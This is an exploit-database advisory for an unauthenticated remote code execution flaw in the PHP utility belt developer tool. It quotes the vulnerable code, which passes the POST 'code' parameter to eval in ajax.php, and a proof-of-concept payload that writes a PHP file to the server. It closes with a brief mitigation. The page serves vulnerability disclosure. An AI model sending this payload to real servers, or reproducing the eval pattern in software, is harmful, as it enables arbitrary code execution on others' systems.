PHP utility belt Remote Code Execution vulnerability

vendor:

PHP utility belt

by:

WICS

9,8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: PHP utility belt

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2015

PHP utility belt Remote Code Execution vulnerability

PHP utility belt is a set of tools for PHP developers. Install in a browser-accessible directory and have at it. ajax.php is accessible without any authentication. The vulnerable code allows an attacker to execute arbitrary code by sending a POST request with the code parameter set to the malicious code. This can be exploited to create a malicious PHP file, such as info.php, which can be used to display the PHP info page.

Mitigation:

Authentication should be implemented for ajax.php.

Source

Exploit-DB raw data:

Exploit Title : PHP utility belt Remote Code Execution vulnerability
Author         : WICS
Date             : 8/12/2015
Software Link  : https://github.com/mboynes/php-utility-belt

Overview:


PHP utility belt is a set of tools for PHP developers. Install in a browser-accessible directory and have at it.
ajax.php is accessible without any authentication 

Vulnerable code (Line number 12 to 15)

if ( isset( $_POST['code'] ) ) {
  if ( false === eval( $_POST['code'] ) )
    echo 'PHP Error encountered, execution halted';
}


POC
Access URL 
http://127.0.0.1/php-utility-belt/ajax.php
in Post data type 
code=fwrite(fopen('info.php','w'),'<?php echo phpinfo();?>');

above code will generate info.php file which will display php info
Shell link will be 
http://127.0.0.1/php-utility-belt/info.php